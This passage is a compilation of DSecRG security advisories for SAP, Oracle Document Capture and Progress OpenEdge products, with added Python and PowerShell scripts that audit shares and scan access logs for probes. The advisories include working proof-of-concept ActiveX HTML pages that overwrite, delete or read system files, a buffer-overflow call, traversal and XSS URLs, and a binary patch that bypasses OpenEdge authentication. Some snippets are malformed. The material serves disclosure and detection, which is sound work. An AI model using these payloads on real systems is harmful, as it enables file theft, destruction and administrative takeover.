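HIJACKABLE_DLLS = {"MFC80RUS.DLL", "MFC80LOC.DLL"}
SHORTCUT_EXT = ".sap"


def audit_shortcut_dirs(root):
    """Walk `root` and report every directory that holds SAP GUI shortcuts
    together with DLL files.

    Returns a list of dicts sorted by directory path:
      dir        - directory (relative to root) with at least one .sap file
      shortcuts  - the .sap files found there
      dlls       - all .dll files sitting beside them
      hijackable - the subset whose name is one the advisory lists
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        shortcuts = sorted(f for f in files if f.lower().endswith(SHORTCUT_EXT))
        if not shortcuts:
            continue
        dlls = sorted(f for f in files if f.lower().endswith(".dll"))
        hijackable = sorted(f for f in dlls if f.upper() in HIJACKABLE_DLLS)
        findings.append({
            "dir": os.path.relpath(dirpath, root),
            "shortcuts": shortcuts,
            "dlls": dlls,
            "hijackable": hijackable,
        })
    return sorted(findings, key=lambda f: f["dir"])


def build_demo_tree(base):
    """Create a constructed sample share layout (not from the advisory):
    one directory mimicking the described setup, one clean shortcut
    directory, and one directory with a DLL but no shortcut."""
    layout = [
        "sapdocs/prod.sap",
        "sapdocs/MFC80LOC.DLL",   # name from the advisory; empty file here
        "sapdocs/readme.txt",
        "clean/test.sap",
        "other/helper.dll",
    ]
    for rel in layout:
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("")
    return base


def run_demo():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return audit_shortcut_dirs(tmp)


if __name__ == "__main__":
    for f in run_demo():
        flag = "HIJACK RISK" if f["hijackable"] else "ok"
        print(f"{f['dir']}: shortcuts={f['shortcuts']} dlls={f['dlls']} -> {flag}")
```

Point audit_shortcut_dirs at the mount point of each share from which users open .sap files. A non-empty hijackable list is exactly the layout the advisory describes; other DLLs next to shortcuts still deserve a look, since the search-order behaviour applies to any library the application resolves by name from its working directory. Applying SAP Note 1511179 remains the fix; this check only finds the staging that would affect an unpatched client.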
[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS
SAP Crystal Report Server 2008 - multiple cross-site scripting vulnerabilities.

[DSecRG-11-011] (Internal DSECRG-00147)

Multiple XSS vulnerabilities were found in the PerformanceManagement module of the SAP Crystal Report Server 2008 application. An attacker can intercept the cookie of an administrator or a regular user of the system.

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://www.sap.com
Bugs: Linked XSS Vulnerability
Exploits: YES
Reported: 06.08.2010
Vendor response: 07.08.2010
Date of Public Advisory: 09.03.2011
Authors: Dmitriy Chastuhin, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Details
***
Using the discovered vulnerabilities, an attacker can intercept the cookie and perform any administrative actions in the system on the victim's behalf.

1. Cross-site scripting vulnerability found in script aa-add-analytic2.jsp
   Vulnerable GET parameter: backURL
2. Cross-site scripting vulnerability found in script aa-add-validate.jsp
   Vulnerable GET parameter: pagePos
3. Cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp
   Vulnerable GET parameter: entry
4. Cross-site scripting vulnerability found in script aa-cacheparams.jsp
   Vulnerable GET parameters: MetaDataCachePeriod, AppBuilderCachePeriod, SessionCachePeriod, RefreshDashboardPeriod
5. Cross-site scripting vulnerability found in script aa-display-flash.jsp
   Vulnerable GET parameter: swf
6. Cross-site scripting vulnerability found in script aa-dmgraph.jsp
   Vulnerable GET parameter: Sel
7. Cross-site scripting vulnerability found in script aa-edit-goal.jsp
   Vulnerable GET parameter: defTar
8. Cross-site scripting vulnerability found in script aa-map-frameset.jsp
   Vulnerable GET parameter: analyticToken
9. Cross-site scripting vulnerability found in script aa-open-inlist.jsp
   Vulnerable GET parameters: url, sWindow, BEGIN_DATE, END_DATE, CURRENT_DATE, CURRENT_SLICE
10. Cross-site scripting vulnerability found in script aa-overviewctxt.jsp
   Vulnerable GET parameters: DocName, Label

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=311
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1509610

Fix Information
*
Solution to this issue is given in the 1509610 security note.
[DSECRG-11-009] SAP NetWaver XI SOAP Adapter - XSS
SAP NetWeaver 7.0 application XI SOAP Adapter has a linked XSS vulnerability.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-009 (Internal DSecRG-00120)

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver XI SOAP Adapter 3.0-7.11
Vendor URL: http://www.sap.com
Bugs: XSS
Exploits: YES
Reported: 25.01.2010
Vendor response: 25.01.2010
Date of Public Advisory: 09.03.2011
CVE-number:
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver 7.0 application XI SOAP Adapter (com.sap.aii.af.soapadapter) has a linked XSS vulnerability.

Details
***
Vulnerable script: HelperServlet
Vulnerable parameters: action

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=309
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1438191

Fix Information
*
Solution to this issue is given in the 1438191 security note.
[DSECRG-11-010] SAP NetWeaver logon.html - XSS
SAP NetWeaver BSP logon page has a linked XSS vulnerability.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-010 (Internal DSecRG-00127)

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver SAP_BASIS 620-730
Vendor URL: http://www.sap.com
Bugs: XSS
Exploits: YES
Reported: 05.02.2010
Vendor response: 06.02.2010
Date of Public Advisory: 09.03.2011
CVE-number:
Author: Alexey Sintsov, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver BSP logon page has a linked XSS vulnerability.

Details
***
Another vulnerability was found, like the ones described in note 887168 and note 887164, but this vulnerability is in another parameter.
Vulnerable variable: logonUrl
Vulnerable page: /sap/bc/public/bsp/sap/system_public/logon.htm
An attacker can send a link to an administrator and get his cookie.

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=310
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1450270

Fix Information
*
Solution to this issue is given in the 1450270 security note.
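The five XSS advisories above (DSECRG-11-013, -012, -011, -009 and -010) list only script names and their vulnerable parameters, which is enough to look for probing in web-server logs while the notes are being applied. The following is an added example, not code from DSecRG or SAP: a Python scanner that reads access-log lines in the combined log format, matches the last path component against the script names from the advisories, and flags requests whose vulnerable parameters carry markup or script indicators, decoding each value a second time so double-encoded payloads are caught too. The log lines in SAMPLE_LOG are constructed for the demonstration; the /rep/ path prefix and the indicator regex are assumptions, while the /sap/bc/public/bsp/... path is the one given in DSECRG-11-010.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Vulnerable script/servlet -> parameters, copied from the DSecRG advisories
# above. Scripts are matched on the last path component of the request URL.
VULNERABLE_PARAMS = {
    # DSECRG-11-013, SAP NetWeaver Runtime (ShowMemLog also in -012)
    "error_msg.jsp": {"id"},
    "ViewCaches.jsp": {"refresh"},
    "ViewLogger.jsp": {"logger"},
    "ShowMemLog": {"thread", "class", "invert", "filter"},
    # DSECRG-11-012, SAP NetWeaver Integration Directory
    "CheckService": {"fileNameL", "directoryNameL"},
    "ExportabilityCheck": {"fileNameL", "directoryNameL"},
    "ViewCaches": {"XiDynPage_ThreadId"},
    # DSECRG-11-011, SAP Crystal Report Server 2008 PerformanceManagement
    "aa-add-analytic2.jsp": {"backURL"},
    "aa-add-validate.jsp": {"pagePos"},
    "aa-analytic-frameset.jsp.jsp": {"entry"},
    "aa-cacheparams.jsp": {"MetaDataCachePeriod", "AppBuilderCachePeriod",
                           "SessionCachePeriod", "RefreshDashboardPeriod"},
    "aa-display-flash.jsp": {"swf"},
    "aa-dmgraph.jsp": {"Sel"},
    "aa-edit-goal.jsp": {"defTar"},
    "aa-map-frameset.jsp": {"analyticToken"},
    "aa-open-inlist.jsp": {"url", "sWindow", "BEGIN_DATE", "END_DATE",
                           "CURRENT_DATE", "CURRENT_SLICE"},
    "aa-overviewctxt.jsp": {"DocName", "Label"},
    # DSECRG-11-009, XI SOAP Adapter
    "HelperServlet": {"action"},
    # DSECRG-11-010, BSP logon page
    "logon.htm": {"logonUrl"},
}

# Markup or script indicators in a parameter value (an assumption of this
# example). The value is decoded a second time before matching so that
# double-encoded payloads are seen as well.
SUSPICIOUS = re.compile(r"[<>]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

# Apache/NCSA combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_request(target):
    """Return [(script, param, value)] for vulnerable parameters of one
    request target whose (once-decoded) value carries an indicator."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = VULNERABLE_PARAMS.get(script)
    if not watched:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and SUSPICIOUS.search(unquote_plus(value)):
            hits.append((script, name, value))
    return hits


def scan_log(lines):
    """Run scan_request over log lines; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for script, param, value in scan_request(m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "script": script,
                             "param": param, "value": value})
    return findings


# Constructed sample log lines (not from the advisories): a benign logon,
# a reflected probe against logonUrl, a probe against ShowMemLog, a benign
# error_msg.jsp request and one line that does not parse at all.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Mar/2011:10:15:01 +0300] "GET /sap/bc/public/bsp/sap/system_public/logon.htm?logonUrl=%2Fsap%2Fbc%2Fbsp%2Fsap%2Fit00 HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Mar/2011:10:16:44 +0300] "GET /sap/bc/public/bsp/sap/system_public/logon.htm?logonUrl=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Mar/2011:10:17:02 +0300] "GET /rep/ShowMemLog?thread=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E&filter=main HTTP/1.1" 200 2048',
    '10.0.0.7 - - [09/Mar/2011:10:18:30 +0300] "GET /rep/error_msg.jsp?id=42 HTTP/1.1" 200 128',
    'not a log line',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['script']} {f['param']}={f['value']!r}")
```

Run it over the full access log of the affected Java or BSP stack to see whether these parameters were probed before the notes were applied. The `[<>]` indicator also fires on legitimate values containing angle brackets, so treat hits as leads to review rather than confirmed attacks; the recorded value is the once-decoded form, so a double-encoded probe is reported the way the server first saw it.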
[DSECRG-00153] Oracle Document Capture Actbar2.ocx - insecure method
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory #DSECRG-00153

Application: Oracle Document Capture
Versions Affected: Release 10gR3
Vendor URL: www.oracle.com
Bugs: insecure method, file overwriting
Exploits: YES
Reported: 22.03.2010
Vendor response: 31.03.2010
Date of Public Advisory: 24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
Oracle Document Capture contains ActiveX components that contain insecure methods.
Insecure method in Actbar2.ocx

Details
***
Oracle Document Capture contains the ActiveX component ActiveBar2Library (Actbar2.ocx), Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}, which contains the insecure method SaveLayoutChanges that can overwrite any unhidden file in the system.

Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False

Exploit
***
An attacker can construct an HTML page which calls the vulnerable function SaveLayoutChanges from the ActiveX component Actbar2.ocx.

Example:
    <HTML>
    <HEAD>
    <TITLE>DSecRG</TITLE>
    </HEAD>
    <BODY>
    <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>
    <SCRIPT>
    function Exploit(){
        eds.SaveLayoutChanges("C:\\31337.txt",1);
    }
    Exploit();
    </SCRIPT>
    </BODY>
    </HTML>

References
**
http://dsecrg.com/pages/vul/show.php?id=304
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Fix Information
*
Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal #DSECRG-09-066)

Application: Oracle Document Capture
Versions Affected: Oracle Document Capture 10.1.3.5
Vendor URL: http://oracle.com
Bugs: Insecure method. Buffer overflow.
Exploits: YES
Reported: 14.12.2009
Vendor response: 15.12.2009
Date of Public Advisory: 24.01.2011
CVE: CVE-2010-3599
Author: Alexandr Polyakov from DSecRG

Description
***
An insecure method was found in the NCSECWLib ActiveX control component, which is a part of Oracle Document Capture. One of its methods (WriteJPG) can be used to overwrite files on the user's system and is also affected by a buffer overflow.

Details
***
An attacker can construct an HTML page which calls the vulnerable function WriteJPG from the ActiveX object NCSECWLib.

Example 1 (file overwrite)
***
    <html>
    <script>
    targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
    prototype  = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
    memberName = "WriteJPG"
    progid     = "NCSECWLib.NCSRenderer"
    argCount   = 3
    arg1="c:\boot.ini"
    arg2=1
    arg3=True
    target.WriteJPG arg1 ,arg2 ,arg3
    </script>
    </html>

Example 2
***
    <html>
    <script>
    targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
    prototype  = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
    memberName = "WriteJPG"
    progid     = "NCSECWLib.NCSRenderer"
    argCount   = 3
    arg1=String(13332, "A")
    arg2=1
    arg3=True
    target.WriteJPG arg1 ,arg2 ,arg3
    </script>
    </job>
    </package>

References
**
http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Fix Information
*
Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files
Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117)

Application: Oracle Document Capture
Versions Affected: 10.1350.0005
Vendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs: Insecure READ method
Exploits: YES
Reported: 29.01.2010
Second report: 02.02.2010
Date of Public Advisory: 24.01.2010
CVE: CVE-2010-3595
Authors: Alexey Sintsov, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
The EasyMail ActiveX Control (emsmtp.dll) included in the Oracle Document Capture distribution can be used to read any file on the target system. The vulnerable method is ImportBodyText().

Details
***
For example, if the filename C:\\boot.ini is passed to the ImportBodyText method, the control will open and read the file C:\boot.ini. The content of boot.ini will be loaded into the property BodyText.

Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False

Example:
***
    <HTML>
    <HEAD>
    <TITLE>DSECRG</TITLE>
    </HEAD>
    <BODY>
    <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
    <SCRIPT>
    function Exploit(){
        ora.ImportBodyText("C:\\boot.ini");
        document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
    }
    Exploit();
    </SCRIPT>
    </BODY>
    </HTML>

References
**
http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Fix Information
*
Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
[DSECRG-00143] SAP Crystal Reports 2008 - ActiveX insecure methods
[DSECRG-11-002] (Internal DSECRG-00143) SAP Crystal Report Server 2008 scriptinghelpers.dll ActiveX component - Insecure methods

The component contains insecure methods through which any file in the OS can be overwritten, an executable file run, a process killed, or a file deleted.

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs: insecure methods
Exploits: YES
Reported: 09.03.2010
Vendor response: 10.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory: 14.01.2011
Authors: Dmitry Chastuhin, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.

Details
*******

Insecure methods were found in the library scriptinghelpers.dll. An attacker could construct an HTML page containing calls to the insecure functions.

1. Insecure method CreateTextFile. Allows creating files and overwriting existing ones.

Sample
******

2. Insecure method LaunchProgram. Allows running an executable file.

3. Insecure method DeleteFile. Allows removing any file in the OS.

4. Insecure method Kill. Allows terminating any process, if its pid is known.

References
**********

http://dsecrg.com/pages/vul/show.php?id=302
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1458309

Fix Information
***************

The solution to this issue is given in SAP security note 1458309.
[DSECRG-11-005] Oracle Document Capture empop3.dll - insecure method
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (Internal #DSECRG-00154)

Application: Oracle Document Capture
Versions Affected: Release 10gR3
Vendor URL: www.oracle.com
Bugs: insecure method, File overwriting, File deleting
Exploits: YES
Reported: 22.03.2010
Vendor response: 31.03.2010
Date of Public Advisory: 24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

Oracle Document Capture contains ActiveX components with insecure methods in empop3.dll.

Details
*******

Oracle Document Capture contains the ActiveX component EMPOP3Lib (empop3.dll), Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}, which contains the insecure method DownloadSingleMessageToFile that can delete any file in the system.

Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegKey Safe for Init: False
KillBitSet: False

An attacker can construct an HTML page that calls the vulnerable function DownloadSingleMessageToFile from the ActiveX component empop3.dll.

Example:
********

<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>
<SCRIPT>
function Exploit(){
    eds.DownloadSingleMessageToFile(1, "C:\\boot.ini", 1);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>

References
**********

http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Fix Information
***************

Information was published in CPU Jan 2011. All customers can download CPU patches following the instructions at:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
[DSECRG-00145] SAP Crystal Reports 2008 - Directory Traversal
DSECRG-11-003 (Internal DSECRG-00145) SAP Crystal Report Server 2008 - Directory Traversal

A directory traversal vulnerability was discovered in the PerformanceManagement module of SAP Crystal Report Server 2008, which allows reading any file on the OS.

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs: Directory Traversal, File Read
Exploits: YES
Reported: 29.03.2010
Vendor response: 30.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory: 14.01.2011
Authors: Dmitriy Chastuhin, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.

Details
*******

A directory traversal vulnerability was found in the script qa.jsp. With this vulnerability, an authenticated attacker can read any file on the server.

Sample
******

http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=../../../../../../boot.ini

References
**********

http://dsecrg.com/pages/vul/show.php?id=303
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1476930

Fix Information
***************

The solution to this issue is given in SAP security note 1476930.
[DSECRG-11-008] Open Edge RDBMS - Multiple architecture vulnerabilities (UNPATCHED)
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-008

Application: Progress OpenEdge Enterprise RDBMS
Versions Affected: 10.2A and maybe others
Vendor URL: http://web.progress.com
Bug: Authentication bypass, UserID enumeration
Exploits: YES
Reported: 13.10.2009
Vendor response: 13.10.2009
Solution: NONE
Date of Public Advisory: 24.01.2011
Authors: Alexander Polyakov, Alexey Sintsov, Alexey Troshichev of Digital Security Research Group [DSecRG]

Description
***********

Progress OpenEdge Enterprise RDBMS (formerly known as the Progress RDBMS) is a high-efficiency relational database management system produced by Progress Software Corp. It is widely used as the backend for customized ERP systems. This RDBMS has vulnerabilities that make it possible to enumerate UserIDs and bypass authentication.

Details
*******

1. UserID enumeration

An attacker can obtain valid UserIDs. This is possible because the OpenEdge RDBMS server gives different answers when the password is incorrect and when the UserID does not exist. The client application shows the same message in both cases, "Your Password and UserID USERID do not match", but at the network layer the answers from the server differ:

Packet 1. From server to client, if the UserID exists (UserID eq AAA):

0x0000  00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00
0x0010  00 C3 00 00 00 00 40 06-7C 33 7F 00 00 01 7F 00
0x0020  00 01 0B B8 10 42 56 07-00 00 00 00 00 00 50 00
0x0030  40 00 00 00 00 00 00 00-00 07 00 2D 00 9B 00 4F
0x0040  00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00
0x0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0x0060  00 00 00 02 00 00 00 01-00 00 7F 68 00 4F FF FB
0x0070  00 00 00 00 00 00 0F 02-00 00 00 00 00 00 00 00
0x0080  22 C0 E7 00 02 00 3C 01-FB 03 41 41 41 10 72 6D   "...AAA.rm
0x0090  57 78 6A 69 64 4E 63 6E-4D 64 6D 69 61 63 03 41   WxjidNcnMdmiac.A
0x00A0  41 41 FA 00 09 FD FD FD-FD FD FD FD FD FF FA 00   AA
0x00B0  09 FD FD FD FD FD FD FD-FD FF FD FD FD FD FD FD
0x00C0  FD FD FD FD FD FD FD FD-FD FD FD FD FD FD FD FD
0x00D0  FD

Packet 2. From server to client, if the UserID does not exist:

0x0000  00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00
0x0010  00 74 00 00 00 00 40 06-7C 82 7F 00 00 01 7F 00
0x0020  00 01 0B B8 10 45 56 07-00 00 00 00 00 00 50 00
0x0030  40 00 00 00 00 00 00 00-00 07 00 2D 00 4C FB 41
0x0040  00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00
0x0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0x0060  00 00 00 02 00 00 00 01-00 00 7F 68 00 00 FF FB

So an attacker can connect to the RDBMS server with different UserIDs and inspect the network answers to find existing UserIDs.

2. Authentication bypass

A remote attacker can log in to the RDBMS with an existing or non-existing UserID without a password. This is possible because the authentication check is performed on the client side. When the password is incorrect, the client application resets the connection with the server and shows a message box. If the password is correct, the client sends to the server the UserID it will use in the RDBMS.

Packet 3. From client to server, when the password for UserID TEST2 is correct:

0x0000  00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00
0x0010  00 6E 00 00 00 00 40 06-7C 88 7F 00 00 01 7F 00
0x0020  00 01 0B 27 0B B8 13 03-00 00 00 00 00 00 50 00
0x0030  40 00 00 00 00 00 00 00-00 09 00 14 00 46 00 00
0x0040  00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00
0x0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 73   Us
0x0060  65 72 69 64 20 69 73 20-6E 6F 77 20 54 45 53 54   erid is now TEST
0x0070  32 2E 20 28 37 30 38 29-00 00 00 00               2. (708)

Example of attack:

Patch %OpenEdge%\bin\prow32.dll (for version 10.2A)
Begin address: 0x020065 - 0f85ce02 + 909090909090

After that, run Data Administration (%OpenEdge%\bin\prowin32.exe) and try to enter the RDBMS with any UserID and without a password. The application shows an error message box, but allows entering the RDBMS with the chosen UserID.

If the chosen UserID has Security Administrator privileges, the attacker gets these privileges. By default in OpenEdge RDBMS all users have Security Administrator privileges.

Fix Information
***************

The only possible fix is to use Windows authentication instead of the proprietary one.

References
**********

http://dsecrg.com/content/vul/edit.php?id=308
[DSECRG-00142] SAP Crystal Reports 2008 - actionNavjsp_xss
An XSS vulnerability was found in SAP Crystal Report Server 2008.

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs: Linked XSS Vulnerability
Exploits: YES
Reported: 04.03.2010
Vendor response: 05.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory: 14.01.2011
Authors: Dmitry Chastuhin, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.

Details
*******

Multiple XSS vulnerabilities were found in the InfoView module.

1. Vulnerability discovered in the JSP page actionNav.jsp of the InfoView module, located at http://sap_server_adr:8080/InfoViewApp/jsp/common/actionNav.faces. Vulnerable parameter: actId. Any user can craft a link to the vulnerable page and steal a user's or administrator's cookie.

2. Vulnerability discovered in the JSP page error.jsp of the InfoView module, located at http://sap_server_adr:8080/InfoViewApp/jsp/common/error.jsp. Vulnerable parameter: backUrl. Any user can craft a link to the vulnerable page and steal a user's or administrator's cookie.

3. Vulnerability discovered in the JSP page logon.jsp of the InfoView module, located at http://sap_server_adr:8080/InfoViewApp/logon.jsp. Vulnerable parameter: logonAction. Any user can craft a link to the vulnerable page and steal a user's or administrator's cookie.

References
**********

http://dsecrg.com/pages/vul/show.php?id=301
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1458310

Fix Information
***************

The solution to this issue is given in SAP security note 1458310.
[DSECRG-09-040] SAP Netweaver wsnavigator XSS Security Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-040

Application: SAP Netweaver
Versions Affected: Version 6.4 - 7.0
Vendor URL: http://SAP.com
Bugs: XSS
Exploits: YES
Reported: 26.05.2009
Vendor response: 27.05.2009
Date of Public Advisory: 13.07.2010
CVE-number:
Author: Alexandr Polyakov, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com). The issue was also reported by another security researcher at the same time.

Description
***********

The SAP Netweaver system has a linked XSS vulnerability in the wsnavigator component.

Details
*******

http://dsecrg.com/pages/vul/show.php?id=140

Example
*******

https://server/wsnavigator/jsps/explorer/help.jsp?title=Test;<script>alert('XSS')</script>

References
**********

http://dsecrg.com/pages/vul/show.php?id=140
https://service.sap.com/sap/support/notes/1169248

Fix Information
***************

A solution for this issue is given by SAP in security note 1169248.
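Until the SAP notes above are applied, the affected pages can at least be watched in the web server's access log. The following PowerShell is an added example, not code from DSecRG or SAP: it flags requests to the endpoints named in the Crystal Report Server traversal and InfoView XSS advisories and in DSECRG-09-040 whose vulnerable parameters carry traversal or script-injection payloads. The log lines are constructed samples; the combined-log request format, the double percent-decoding and the payload patterns are my assumptions, the endpoint paths and parameter names come from the advisories.

```powershell
# Added example (not from DSecRG or SAP): flag access-log requests that hit the
# endpoints named in the advisories above with traversal or script-injection
# payloads. Assumes a common/combined log format whose request field is
# "METHOD URL HTTP/x.y"; paths and parameter names are taken from the advisories.

# One rule per vulnerable endpoint: path prefix, parameters named in the advisory,
# and the class of payload to look for in them.
$Rules = @(
    @{ Path = '/PerformanceManagement/jsp/qa.jsp';    Params = @('path');        Kind = 'traversal'; Note = 'DSECRG-11-003 / SAP note 1476930' }
    @{ Path = '/InfoViewApp/jsp/common/actionNav';   Params = @('actId');       Kind = 'xss';       Note = 'InfoView XSS / SAP note 1458310' }
    @{ Path = '/InfoViewApp/jsp/common/error.jsp';   Params = @('backUrl');     Kind = 'xss';       Note = 'InfoView XSS / SAP note 1458310' }
    @{ Path = '/InfoViewApp/logon.jsp';              Params = @('logonAction'); Kind = 'xss';       Note = 'InfoView XSS / SAP note 1458310' }
    @{ Path = '/wsnavigator/jsps/explorer/help.jsp'; Params = @('title');       Kind = 'xss';       Note = 'DSECRG-09-040 / SAP note 1169248' }
)

function Get-QueryParams {
    # Split a query string into a hashtable. Values are percent-decoded twice so
    # that double-encoded sequences such as %252e%252e are seen as "..".
    param([string]$Query)
    $result = @{}
    foreach ($pair in ($Query -split '&')) {
        if ($pair -eq '') { continue }
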